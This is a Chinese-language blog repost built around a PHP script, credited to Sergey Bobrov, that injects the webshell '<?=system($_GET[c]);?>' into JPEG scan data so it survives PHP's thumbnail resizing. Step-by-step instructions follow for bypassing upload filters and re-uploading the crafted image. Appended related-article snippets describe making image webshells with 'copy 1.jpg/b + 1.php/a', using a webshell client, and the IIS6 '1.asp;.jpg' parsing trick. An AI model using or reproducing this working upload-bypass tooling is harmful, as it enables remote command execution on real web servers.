突破php 的imagecopyresampled 和imagecopyresized 实现图片马 JPG

之前有人发布了 利用PNG 图片上述压缩函数的方法 原理利用 
PNG的结构IDAT chunks填充一句话webshell,并进行一套取模运算  详见: 
https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/

但是受限于  图像的尺寸 必须320×320 且必须是PNG格式

那JPG怎么办

神奇的老外 提出了列方法

<?php 
        /*

The algorithm of injecting the payload into the JPG image, which will keep unchanged after transformations 
        caused by PHP functions imagecopyresized() and imagecopyresampled(). 
        It is necessary that the size and quality of the initial image are the same as those of the processed 
        image.

1) Upload an arbitrary image via secured files upload script 
        2) Save the processed image and launch: 
        php jpg_payload.php <jpg_name.jpg>

In case of successful injection you will get a specially crafted image, which should be uploaded again.

Since the most straightforward injection method is used, the following problems can occur: 
        1) After the second processing the injected data may become partially corrupted.
        2) The jpg_payload.php script outputs "Something‘s wrong". 
        If this happens, try to change the payload (e.g. add some symbols at the beginning) or try another 
        initial image.

Sergey Bobrov @Black2Fan.

See also: 
        https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/

*/

$miniPayload = ‘<?=system($_GET[c]);?>‘;

if(!extension_loaded(‘gd‘) || !function_exists(‘imagecreatefromjpeg‘)) { 
        die(‘php-gd is not installed‘); 
        } 
       
        if(!isset($argv[1])) { 
                die(‘php jpg_payload.php <jpg_name.jpg>‘); 
        }

set_error_handler("custom_error_handler");

for($pad = 0; $pad < 1024; $pad++) { 
                $nullbytePayloadSize = $pad; 
                $dis = new DataInputStream($argv[1]); 
                $outStream = file_get_contents($argv[1]); 
                $extraBytes = 0; 
                $correctImage = TRUE;

if($dis->readShort() != 0xFFD8) { 
                        die(‘Incorrect SOI marker‘); 
                }

while((!$dis->eof()) && ($dis->readByte() == 0xFF)) { 
                        $marker = $dis->readByte(); 
                        $size = $dis->readShort() - 2; 
                        $dis->skip($size); 
                        if($marker === 0xDA) { 
                                $startPos = $dis->seek(); 
                                $outStreamTmp = 
                                        substr($outStream, 0, $startPos) . 
                                        $miniPayload . 
                                        str_repeat("\0",$nullbytePayloadSize) . 
                                        substr($outStream, $startPos); 
                                checkImage(‘_‘.$argv[1], $outStreamTmp, TRUE); 
                                if($extraBytes !== 0) { 
                                        while((!$dis->eof())) { 
                                                if($dis->readByte() === 0xFF) { 
                                                        if($dis->readByte !== 0x00) { 
                                                                break; 
                                                        } 
                                                } 
                                        } 
                                        $stopPos = $dis->seek() - 2; 
                                        $imageStreamSize = $stopPos - $startPos; 
                                        $outStream = 
                                                substr($outStream, 0, $startPos) . 
                                                $miniPayload . 
                                                substr( 
                                                        str_repeat("\0",$nullbytePayloadSize). 
                                                                substr($outStream, $startPos, $imageStreamSize), 
                                                        0, 
                                                        $nullbytePayloadSize+$imageStreamSize-$extraBytes) . 
                                                                substr($outStream, $stopPos); 
                                } elseif($correctImage) { 
                                        $outStream = $outStreamTmp; 
                                } else { 
                                        break; 
                                } 
                                if(checkImage(‘payload_‘.$argv[1], $outStream)) { 
                                        die(‘Success!‘); 
                                } else { 
                                        break; 
                                } 
                        } 
                } 
        } 
        unlink(‘payload_‘.$argv[1]); 
        die(‘Something\‘s wrong‘);

function checkImage($filename, $data, $unlink = FALSE) { 
                global $correctImage; 
                file_put_contents($filename, $data); 
                $correctImage = TRUE; 
                imagecreatefromjpeg($filename); 
                if($unlink) 
                        unlink($filename); 
                return $correctImage; 
        }

function custom_error_handler($errno, $errstr, $errfile, $errline) { 
                global $extraBytes, $correctImage; 
                $correctImage = FALSE; 
                if(preg_match(‘/(\d+) extraneous bytes before marker/‘, $errstr, $m)) { 
                        if(isset($m[1])) { 
                                $extraBytes = (int)$m[1]; 
                        } 
                } 
        }

class DataInputStream { 
                private $binData; 
                private $order; 
                private $size;

public function __construct($filename, $order = false, $fromString = false) { 
                        $this->binData = ‘‘; 
                        $this->order = $order; 
                        if(!$fromString) { 
                                if(!file_exists($filename) || !is_file($filename)) 
                                        die(‘File not exists [‘.$filename.‘]‘); 
                                $this->binData = file_get_contents($filename); 
                        } else { 
                                $this->binData = $filename; 
                        } 
                        $this->size = strlen($this->binData); 
                }

public function seek() { 
                        return ($this->size - strlen($this->binData)); 
                }

public function skip($skip) { 
                        $this->binData = substr($this->binData, $skip); 
                }

public function readByte() { 
                        if($this->eof()) { 
                                die(‘End Of File‘); 
                        } 
                        $byte = substr($this->binData, 0, 1); 
                        $this->binData = substr($this->binData, 1); 
                        return ord($byte); 
                }

public function readShort() { 
                        if(strlen($this->binData) < 2) { 
                                die(‘End Of File‘); 
                        } 
                        $short = substr($this->binData, 0, 2); 
                        $this->binData = substr($this->binData, 2); 
                        if($this->order) { 
                                $short = (ord($short[1]) << 8) + ord($short[0]); 
                        } else { 
                                $short = (ord($short[0]) << 8) + ord($short[1]); 
                        } 
                        return $short; 
                }

public function eof() { 
                        return !$this->binData||(strlen($this->binData) === 0); 
                } 
        } 
?>

http://pastebin.com/3cznqi8P 
具体方法 时: 
1.  你先要 上传你想要构造的图片马原片 
2.  等网站生成完缩略图下载下来 
3.  用上述脚本 生成带图片的 木马 
4.  重新上传到网站     结束

这个也要看运气成分

drops 里面园长MM说喜欢看我的图像,我会告诉你这图像是可以的。

时间: 2024-10-06 14:08:27

突破php 的imagecopyresampled 和imagecopyresized 实现图片马 JPG的相关文章

图片马的制作以及菜刀的使用

有些网站我们在拿shell的时候,会要用到上传文件,但是有的时候都会有过滤,如果只是上传.asp .php结尾的文件的话系统是不会给你上传的,那么这个时候我们通常会利用一些其他的思路,比如说iis6中的解析漏洞,把一句话放到图片里面,写成1.asp;.jpg 1.asp;.jpg的格式上传上去,这样上传的时候文件会被检测为是图片,上传成功之后会将这个文件当asp来解析 图片马是WEB渗透测试时的必备,今天就教大家怎么做图片马.非常简单 图片马指的是代码写入后不破坏图片为前提,图片仍可正常打开.

图片马合成方法

1.将图片和一句话木马放在同一个文件夹 2.创建快捷方式,将起始位置修改为图片和txt文本的路径. 3.进行合成,命令如下 copy 1.png /b + 1.txt /a 2.png 4.成功!自行测试.本人亲测可用.

制作一句话图片马

原文地址:https://www.cnblogs.com/gdf456/p/9586059.html

imagecopyresampled()改变图片大小后质量要比imagecopyresized()高。

php程序中改变图片大小的函数大多数人都想到用imagecopyresized(),不过经过测试比较发现,使用imagecopyresampled()改变的图片质量更高. 下面我们来看看两者的比较结果. 原图: 使用imagecopyresized()将图片缩小一半 代码: <?php// File and new size$filename = 'test.jpg';$percent = 0.5;// Content typeheader('Content-Type: image/jpeg')

CMD命令下图片合成一句话木马命令

非常简单,我们只需要一张图片1.jpg一句话木马写好的php文件 1.php之后我们进入到命令行.注意:将php文件和图片文件放到同一目录下,cmd也要跳转到放文件的目录下之后执行命令 copy 1.jpg/b + 1.php/a 2.jpg 新生成的2.jpg就是我们制作好的图片马了,之后我们就可以通过工具来进行连接了. 原文地址:https://www.cnblogs.com/hack747/p/12271069.html

ImageCopyResamples()

PHP图像缩放的两个函数比较 PHP缩放图像有两种方法: ImageCopyResized() 函数在所有GD版本中有效,但其缩放图像的算法比较粗糙. ImageCopyResamples(),其像素插值算法得到的图像边缘比较平滑,质量较好,但该函数的速度比 ImageCopyResized() 慢. 01 if($src_h){ 02 $thumb_w = $size; 03 $thumb_h = intval($src_h / $src_w * $size); 04 }else{ 05 $t

GD库笔记

^.GD简介 PHP 不仅限于只产生 HTML 的输出,还可以创建及操作多种不同格式的图像文件. PHP提供了一些内置的图像信息函数,也可以使用GD函数库创建新图像或处理已有的图像. 目前GD2库支持GIF.JPEG.PNG和WBMP等格式.此外还支持一些FreeType.Type1等字体库. JPEG 是一种压缩标准的名字,通常是用来存储照片或者存储具有丰富色彩和色彩层次的图像.这种格式使用了有损压缩. PNG 是可移植的网络图像,对图像采用了无损压缩标准. GIF 原义是“图像互换格式”,是

城市VR全景应用,全景智慧城市与你合作共赢

20VR全景展示初具规模的时候,随着VR技术的日益成熟,越来越多的行业将VR全景应用到日常宣传和营销中,今天要说的就是VR全景展示的具体应用.那么,VR全景究竟会应用到那些场景,哪些行业适合应用VR全景展示昵?我们又会在什么地方可以见到它们的应用呢?   VR全景展示技术从问世到2016年,已经被开始在很多方面进行了大范围的应用,我们也在很多场景中遇到过360度全景的应用实例.但很多时候,有的人还会问,VR全景到底在哪些方面能进行应用呢?今天我就跟大加简单家介绍一下几个VR全景的应用场景. 一.

GD库处理图像

在PHP5中,动态图象的处理要比以前容易得多.PHP5在php.ini文件中包含了GD扩展包,只需去掉GD扩展包的相应注释就可以正常使用了.PHP5包含的GD库正是升级的GD2库,其中包含支持真彩图像处理的一些有用的JPG功能. 一般生成的图形,通过PHP的文档格式存放,但可以通过HTML的图片插入方式SRC来直接获取动态图形.比如,验证码.水印.微缩图等. 一.创建图像 创建图像的一般流程: 1).设定标头,告诉浏览器你要生成的MIME类型. 2).创建一个图像区域,以后的操作都将基于此图像区